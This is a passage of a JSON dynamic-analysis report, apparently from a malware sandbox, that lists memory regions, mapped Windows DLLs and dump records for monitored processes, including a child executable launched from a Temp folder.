"start_va": 1620312064, "type": "region", "version": 1 }, "end_va": 1621377023, "entry_point": 1620312064, "filename": "\\Windows\\assembly\\NativeImages_v2.0.50727_32\\System.Management\\6f3b99ed0b791ff4d8aa52f2f0cd0bcf\\System.Management.ni.dll", "id": "region_592", "name": "system.management.ni.dll", "norm_filename": "c:\\windows\\assembly\\nativeimages_v2.0.50727_32\\system.management\\6f3b99ed0b791ff4d8aa52f2f0cd0bcf\\system.management.ni.dll", "region_type": "memory_mapped_file", "start_va": 1620312064, "timestamp": "00:00:28.934", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "untracked_file_region" ], "info": "No dump was created because mapped file is not tracked", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 5464064, "start_va": 1621426176, "type": "region", "version": 1 }, "end_va": 1626890239, "entry_point": 1621426176, "filename": "\\Windows\\assembly\\NativeImages_v2.0.50727_32\\System.Xml\\461d3b6b3f43e6fbe6c897d5936e17e4\\System.Xml.ni.dll", "id": "region_593", "name": "system.xml.ni.dll", "norm_filename": "c:\\windows\\assembly\\nativeimages_v2.0.50727_32\\system.xml\\461d3b6b3f43e6fbe6c897d5936e17e4\\system.xml.ni.dll", "region_type": "memory_mapped_file", "start_va": 1621426176, "timestamp": "00:00:28.941", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 20480, "start_va": 1912864768, "type": "region", "version": 1 }, "end_va": 1912885247, "entry_point": 1912864768, "filename": "\\Windows\\System32\\shfolder.dll", "id": "region_594", "name": "shfolder.dll", "norm_filename": "c:\\windows\\system32\\shfolder.dll", "region_type": "memory_mapped_file", "start_va": 1912864768, "timestamp": "00:00:28.948", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 69632, "start_va": 32505856, "type": "region", "version": 1 }, "end_va": 32575487, "entry_point": 0, "filename": null, "id": "region_595", "name": "pagefile_0x0000000001f00000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 32505856, "timestamp": "00:00:29.767", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000002-region_00000596-addr_0x0000000001f20000-size_0x0000000000010000-perm_.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "" ], "ref_process_dump": { "ref_id": "proc_dump_68", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 65536, "start_va": 32636928, "type": "region", "version": 1 }, "end_va": 32702463, "entry_point": 0, "filename": null, "id": "region_596", "name": "private_0x0000000001f20000", "norm_filename": null, "region_type": "private_memory", "start_va": 32636928, "timestamp": "00:00:29.768", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000002-region_00000597-addr_0x0000000001f70000-size_0x0000000000010000-perm_.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "" ], "ref_process_dump": { "ref_id": "proc_dump_69", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 65536, "start_va": 32964608, "type": "region", "version": 1 }, "end_va": 33030143, "entry_point": 0, "filename": null, "id": "region_597", "name": "private_0x0000000001f70000", "norm_filename": null, "region_type": "private_memory", "start_va": 32964608, "timestamp": "00:00:29.768", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000002-region_00000598-addr_0x0000000004330000-size_0x0000000000010000-perm_.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "" ], "ref_process_dump": { "ref_id": "proc_dump_70", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 65536, "start_va": 70451200, "type": "region", "version": 1 }, "end_va": 70516735, "entry_point": 0, "filename": null, "id": "region_598", "name": "private_0x0000000004330000", "norm_filename": null, "region_type": "private_memory", "start_va": 70451200, "timestamp": "00:00:29.769", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000002-region_00000599-addr_0x0000000004340000-size_0x0000000000010000-perm_.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "" ], "ref_process_dump": { "ref_id": "proc_dump_71", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 65536, "start_va": 70516736, "type": "region", "version": 1 }, "end_va": 70582271, "entry_point": 0, "filename": null, "id": "region_599", "name": "private_0x0000000004340000", "norm_filename": null, "region_type": "private_memory", "start_va": 70516736, "timestamp": "00:00:29.769", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000002-region_00000600-addr_0x0000000004350000-size_0x0000000000010000-perm_.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "" ], "ref_process_dump": { "ref_id": "proc_dump_72", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 65536, "start_va": 70582272, "type": "region", "version": 1 }, "end_va": 70647807, "entry_point": 0, "filename": null, "id": "region_600", "name": "private_0x0000000004350000", "norm_filename": null, "region_type": "private_memory", "start_va": 70582272, "timestamp": "00:00:29.769", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000002-region_00000601-addr_0x0000000004360000-size_0x0000000000010000-perm_.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "" ], "ref_process_dump": { "ref_id": "proc_dump_73", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 65536, "start_va": 70647808, "type": "region", "version": 1 }, "end_va": 70713343, "entry_point": 0, "filename": null, "id": "region_601", "name": "private_0x0000000004360000", "norm_filename": null, "region_type": "private_memory", "start_va": 70647808, "timestamp": "00:00:29.770", "type": "region", "version": 1 } ], "terminate_reason": "terminated", "type": "monitored_process", "unmonitor_reason": "terminated_by_timeout", "version": 1 }, { "cmd_line": "\"C:\\Users\\BGC6U8~1\\AppData\\Local\\Temp\\42753.exe\" ", "filename": "c:\\users\\bgc6u8~1\\appdata\\local\\temp\\42753.exe", "id": "proc_3", "image_name": "42753.exe", "monitor_reason": "child_process", "monitored_id": 3, "origin_monitor_id": 2, "ref_parent_process": { "ref_id": "proc_2", "ref_source": "summary", "ref_type": "monitored_process", "type": "reference", "version": 1 }, "regions": [ { "dump": { "filename": "process_00000003-region_00000690-addr_0x0000000000010000-size_0x0000000000020000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_106", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 131072, "start_va": 65536, "type": "region", "version": 1 }, "end_va": 196607, "entry_point": 0, "filename": null, "id": "region_690", "name": "private_0x0000000000010000", "norm_filename": null, "region_type": "private_memory", "start_va": 65536, "timestamp": "00:00:47.531", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000003-region_00000691-addr_0x0000000000030000-size_0x0000000000100000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_107", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 1048576, "start_va": 196608, "type": "region", "version": 1 }, "end_va": 1245183, "entry_point": 0, "filename": null, "id": "region_691", "name": "private_0x0000000000030000", "norm_filename": null, "region_type": "private_memory", "start_va": 196608, "timestamp": "00:00:47.531", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 16384, "start_va": 1245184, "type": "region", "version": 1 }, "end_va": 1261567, "entry_point": 0, "filename": null, "id": "region_692", "name": "pagefile_0x0000000000130000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 1245184, "timestamp": "00:00:47.531", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "untracked_file_region" ], "info": "No dump was created because mapped file is not tracked", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 106496, "start_va": 4194304, "type": "region", "version": 1 }, "end_va": 4300799, "entry_point": 4194304, "filename": "\\Users\\BGC6U8~1\\AppData\\Local\\Temp\\42753.exe", "id": "region_693", "name": "42753.exe", "norm_filename": "c:\\users\\bgc6u8~1\\appdata\\local\\temp\\42753.exe", "region_type": "memory_mapped_file", "start_va": 4194304, "timestamp": "00:00:47.531", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1294336, "start_va": 1999241216, "type": "region", "version": 1 }, "end_va": 2000535551, "entry_point": 1999241216, "filename": "\\Windows\\System32\\ntdll.dll", "id": "region_694", "name": "ntdll.dll", "norm_filename": "c:\\windows\\system32\\ntdll.dll", "region_type": "memory_mapped_file", "start_va": 1999241216, "timestamp": "00:00:47.532", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 4096, "start_va": 2001600512, "type": "region", "version": 1 }, "end_va": 2001604607, "entry_point": 2001600512, "filename": "\\Windows\\System32\\apisetschema.dll", "id": "region_695", "name": "apisetschema.dll", "norm_filename": "c:\\windows\\system32\\apisetschema.dll", "region_type": "memory_mapped_file", "start_va": 2001600512, "timestamp": "00:00:47.532", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 143360, "start_va": 2147155968, "type": "region", "version": 1 }, "end_va": 2147299327, "entry_point": 0, "filename": null, "id": "region_696", "name": "pagefile_0x000000007ffb0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 2147155968, "timestamp": "00:00:47.535", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000003-region_00000697-addr_0x000000007ffde000-size_0x0000000000001000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_108", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 2147344384, "type": "region", "version": 1 }, "end_va": 2147348479, "entry_point": 0, "filename": null, "id": "region_697", "name": "private_0x000000007ffde000", "norm_filename": null, "region_type": "private_memory", "start_va": 2147344384, "timestamp": "00:00:47.535", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000003-region_00000698-addr_0x000000007ffdf000-size_0x0000000000001000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_109", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 2147348480, "type": "region", "version": 1 }, "end_va": 2147352575, "entry_point": 0, "filename": null, "id": "region_698", "name": "private_0x000000007ffdf000", "norm_filename": null, "region_type": "private_memory", "start_va": 2147348480, "timestamp": "00:00:47.535", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 65536, "start_va": 65536, "type": "region", "version": 1 }, "end_va": 131071, "entry_point": 0, "filename": null, "id": "region_699", "name": "pagefile_0x0000000000010000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 65536, "timestamp": "00:00:47.663", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 421888, "start_va": 1310720, "type": "region", "version": 1 }, "end_va": 1732607, "entry_point": 1310720, "filename": "\\Windows\\System32\\locale.nls", "id": "region_700", "name": "locale.nls", "norm_filename": "c:\\windows\\system32\\locale.nls", "region_type": "memory_mapped_file", "start_va": 1310720, "timestamp": "00:00:47.663", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000003-region_00000701-addr_0x0000000000220000-size_0x0000000000010000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_110", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 65536, "start_va": 2228224, "type": "region", "version": 1 }, "end_va": 2293759, "entry_point": 0, "filename": null, "id": "region_701", "name": "private_0x0000000000220000", "norm_filename": null, "region_type": "private_memory", "start_va": 2228224, "timestamp": "00:00:47.665", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000003-region_00000702-addr_0x00000000002e0000-size_0x0000000000100000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_111", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 1048576, "start_va": 3014656, "type": "region", "version": 1 }, "end_va": 4063231, "entry_point": 0, "filename": null, "id": "region_702", "name": "private_0x00000000002e0000", "norm_filename": null, "region_type": "private_memory", "start_va": 3014656, "timestamp": "00:00:47.665", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1716224, "start_va": 1604255744, "type": "region", "version": 1 }, "end_va": 1605971967, "entry_point": 1604255744, "filename": "\\Windows\\System32\\esent.dll", "id": "region_703", "name": "esent.dll", "norm_filename": "c:\\windows\\system32\\esent.dll", "region_type": "memory_mapped_file", "start_va": 1604255744, "timestamp": "00:00:47.666", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 540672, "start_va": 1857355776, "type": "region", "version": 1 }, "end_va": 1857896447, "entry_point": 1857355776, "filename": "\\Windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\\comctl32.dll", "id": "region_704", "name": "comctl32.dll", "norm_filename": "c:\\windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\\comctl32.dll", "region_type": "memory_mapped_file", "start_va": 1857355776, "timestamp": "00:00:47.679", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 2359296, "start_va": 1895563264, "type": "region", "version": 1 }, "end_va": 1897922559, "entry_point": 1895589565, "filename": "\\Windows\\System32\\msi.dll", "id": "region_705", "name": "msi.dll", "norm_filename": "c:\\windows\\system32\\msi.dll", "region_type": "memory_mapped_file", "start_va": 1895563264, "timestamp": "00:00:47.732", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 303104, "start_va": 1967587328, "type": "region", "version": 1 }, "end_va": 1967890431, "entry_point": 1967619552, "filename": "\\Windows\\System32\\KernelBase.dll", "id": "region_706", "name": "kernelbase.dll", "norm_filename": "c:\\windows\\system32\\kernelbase.dll", "region_type": "memory_mapped_file", "start_va": 1967587328, "timestamp": "00:00:47.733", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 102400, "start_va": 1970208768, "type": "region", "version": 1 }, "end_va": 1970311167, "entry_point": 1970227573, "filename": "\\Windows\\System32\\sechost.dll", "id": "region_707", "name": "sechost.dll", "norm_filename": "c:\\windows\\system32\\sechost.dll", "region_type": "memory_mapped_file", "start_va": 1970208768, "timestamp": "00:00:47.733", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 659456, "start_va": 1970339840, "type": "region", "version": 1 }, "end_va": 1970999295, "entry_point": 1970545715, "filename": "\\Windows\\System32\\rpcrt4.dll", "id": "region_708", "name": "rpcrt4.dll", "norm_filename": "c:\\windows\\system32\\rpcrt4.dll", "region_type": "memory_mapped_file", "start_va": 1970339840, "timestamp": "00:00:47.734", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 12886016, "start_va": 1971978240, "type": "region", "version": 1 }, "end_va": 1984864255, "entry_point": 1972508161, "filename": "\\Windows\\System32\\shell32.dll", "id": "region_709", "name": "shell32.dll", "norm_filename": "c:\\windows\\system32\\shell32.dll", "region_type": "memory_mapped_file", "start_va": 1971978240, "timestamp": "00:00:47.734", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 655360, "start_va": 1984888832, "type": "region", "version": 1 }, "end_va": 1985544191, "entry_point": 1984973285, "filename": "\\Windows\\System32\\advapi32.dll", "id": "region_710", "name": "advapi32.dll", "norm_filename": "c:\\windows\\system32\\advapi32.dll", "region_type": "memory_mapped_file", "start_va": 1984888832, "timestamp": "00:00:47.735", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 868352, "start_va": 1985544192, "type": "region", "version": 1 }, "end_va": 1986412543, "entry_point": 1985854948, "filename": "\\Windows\\System32\\kernel32.dll", "id": "region_711", "name": "kernel32.dll", "norm_filename": "c:\\windows\\system32\\kernel32.dll", "region_type": "memory_mapped_file", "start_va": 1985544192, "timestamp": "00:00:47.735", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 503808, "start_va": 1986461696, "type": "region", "version": 1 }, "end_va": 1986965503, "entry_point": 1986461696, "filename": "\\Windows\\System32\\comdlg32.dll", "id": "region_712", "name": "comdlg32.dll", "norm_filename": "c:\\windows\\system32\\comdlg32.dll", "region_type": "memory_mapped_file", "start_va": 1986461696, "timestamp": "00:00:47.736", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 704512, "start_va": 1987575808, "type": "region", "version": 1 }, "end_va": 1988280319, "entry_point": 1987617906, "filename": "\\Windows\\System32\\msvcrt.dll", "id": "region_713", "name": "msvcrt.dll", "norm_filename": "c:\\windows\\system32\\msvcrt.dll", "region_type": "memory_mapped_file", "start_va": 1987575808, "timestamp": "00:00:47.744", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 40960, "start_va": 1988296704, "type": "region", "version": 1 }, "end_va": 1988337663, "entry_point": 1988301676, "filename": "\\Windows\\System32\\lpk.dll", "id": "region_714", "name": "lpk.dll", "norm_filename": "c:\\windows\\system32\\lpk.dll", "region_type": "memory_mapped_file", "start_va": 1988296704, "timestamp": "00:00:47.744", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 319488, "start_va": 1988362240, "type": "region", "version": 1 }, "end_va": 1988681727, "entry_point": 1988402185, "filename": "\\Windows\\System32\\gdi32.dll", "id": "region_715", "name": "gdi32.dll", "norm_filename": "c:\\windows\\system32\\gdi32.dll", "region_type": "memory_mapped_file", "start_va": 1988362240, "timestamp": "00:00:47.745", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 823296, "start_va": 1988689920, "type": "region", "version": 1 }, "end_va": 1989513215, "entry_point": 1988810513, "filename": "\\Windows\\System32\\user32.dll", "id": "region_716", "name": "user32.dll", "norm_filename": "c:\\windows\\system32\\user32.dll", "region_type": "memory_mapped_file", "start_va": 1988689920, "timestamp": "00:00:47.745", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 356352, "start_va": 1991507968, "type": "region", "version": 1 }, "end_va": 1991864319, "entry_point": 1991613350, "filename": "\\Windows\\System32\\shlwapi.dll", "id": "region_717", "name": "shlwapi.dll", "norm_filename": "c:\\windows\\system32\\shlwapi.dll", "region_type": "memory_mapped_file", "start_va": 1991507968, "timestamp": "00:00:47.746", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 643072, "start_va": 1994784768, "type": "region", "version": 1 }, "end_va": 1995427839, "entry_point": 1994997719, "filename": "\\Windows\\System32\\usp10.dll", "id": "region_718", "name": "usp10.dll", "norm_filename": "c:\\windows\\system32\\usp10.dll", "region_type": "memory_mapped_file", "start_va": 1994784768, "timestamp": "00:00:47.747", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1425408, "start_va": 1997799424, "type": "region", "version": 1 }, "end_va": 1999224831, "entry_point": 1998109245, "filename": "\\Windows\\System32\\ole32.dll", "id": "region_719", "name": "ole32.dll", "norm_filename": "c:\\windows\\system32\\ole32.dll", "region_type": "memory_mapped_file", "start_va": 1997799424, "timestamp": "00:00:47.747", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 1048576, "start_va": 2137980928, "type": "region", "version": 1 }, "end_va": 2139029503, "entry_point": 0, "filename": null, "id": "region_720", "name": "pagefile_0x000000007f6f0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 2137980928, "timestamp": "00:00:47.748", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000003-region_00000722-addr_0x0000000000420000-size_0x00000000000c0000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_112", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 786432, "start_va": 4325376, "type": "region", "version": 1 }, "end_va": 5111807, "entry_point": 0, "filename": null, "id": "region_722", "name": "private_0x0000000000420000", "norm_filename": null, "region_type": "private_memory", "start_va": 4325376, "timestamp": "00:00:47.872", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 20480, "start_va": 2000617472, "type": "region", "version": 1 }, "end_va": 2000637951, "entry_point": 2000622648, "filename": "\\Windows\\System32\\psapi.dll", "id": "region_723", "name": "psapi.dll", "norm_filename": "c:\\windows\\system32\\psapi.dll", "region_type": "memory_mapped_file", "start_va": 2000617472, "timestamp": "00:00:47.872", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 819200, "start_va": 5111808, "type": "region", "version": 1 }, "end_va": 5931007, "entry_point": 0, "filename": null, "id": "region_724", "name": "pagefile_0x00000000004e0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 5111808, "timestamp": "00:00:47.979", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 835584, "start_va": 1971060736, "type": "region", "version": 1 }, "end_va": 1971896319, "entry_point": 1971066507, "filename": "\\Windows\\System32\\msctf.dll", "id": "region_725", "name": "msctf.dll", "norm_filename": "c:\\windows\\system32\\msctf.dll", "region_type": "memory_mapped_file", "start_va": 1971060736, "timestamp": "00:00:47.979", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 126976, "start_va": 2000683008, "type": "region", "version": 1 }, "end_va": 2000809983, "entry_point": 2000687957, "filename": "\\Windows\\System32\\imm32.dll", "id": "region_726", "name": "imm32.dll", "norm_filename": "c:\\windows\\system32\\imm32.dll", "region_type": "memory_mapped_file", "start_va": 2000683008, "timestamp": "00:00:47.981", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000003-region_00000727-addr_0x0000000000020000-size_0x0000000000001000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_113", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 131072, "type": "region", "version": 1 }, "end_va": 135167, "entry_point": 0, "filename": null, "id": "region_727", "name": "private_0x0000000000020000", "norm_filename": null, "region_type": "private_memory", "start_va": 131072, "timestamp": "00:00:48.003", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000003-region_00000728-addr_0x00000000001b0000-size_0x0000000000001000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_114", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 1769472, "type": "region", "version": 1 }, "end_va": 1773567, "entry_point": 0, "filename": null, "id": "region_728", "name": "private_0x00000000001b0000", "norm_filename": null, "region_type": "private_memory", "start_va": 1769472, "timestamp": "00:00:48.003", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 1052672, "start_va": 5963776, "type": "region", "version": 1 }, "end_va": 7016447, "entry_point": 0, "filename": null, "id": "region_729", "name": "pagefile_0x00000000005b0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 5963776, "timestamp": "00:00:48.003", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "region_too_big" ], "info": "No dump was created because region size surpasses maximum region dump size of the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 12582912, "start_va": 7077888, "type": "region", "version": 1 }, "end_va": 19660799, "entry_point": 0, "filename": null, "id": "region_730", "name": "pagefile_0x00000000006c0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 7077888, "timestamp": "00:00:48.004", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000003-region_00000731-addr_0x00000000013b0000-size_0x0000000000010000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_115", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 65536, "start_va": 20643840, "type": "region", "version": 1 }, "end_va": 20709375, "entry_point": 0, "filename": null, "id": "region_731", "name": "private_0x00000000013b0000", "norm_filename": null, "region_type": "private_memory", "start_va": 20643840, "timestamp": "00:00:48.004", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000003-region_00000732-addr_0x00000000001c0000-size_0x0000000000012000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_116", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 73728, "start_va": 1835008, "type": "region", "version": 1 }, "end_va": 1908735, "entry_point": 0, "filename": null, "id": "region_732", "name": "private_0x00000000001c0000", "norm_filename": null, "region_type": "private_memory", "start_va": 1835008, "timestamp": "00:00:48.021", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000003-region_00000733-addr_0x00000000001e0000-size_0x000000000000d000-perm_rwx.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": { "ref_id": "proc_dump_117", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 53248, "start_va": 1966080, "type": "region", "version": 1 }, "end_va": 2019327, "entry_point": 0, "filename": null, "id": "region_733", "name": "private_0x00000000001e0000", "norm_filename": null, "region_type": "private_memory", "start_va": 1966080, "timestamp": "00:00:48.025", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 360448, "start_va": 1906376704, "type": "region", "version": 1 }, "end_va": 1906737151, "entry_point": 1906381748, "filename": "\\Windows\\System32\\winhttp.dll", "id": "region_734", "name": "winhttp.dll", "norm_filename": "c:\\windows\\system32\\winhttp.dll", "region_type": "memory_mapped_file", "start_va": 1906376704, "timestamp": "00:00:48.205", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 323584, 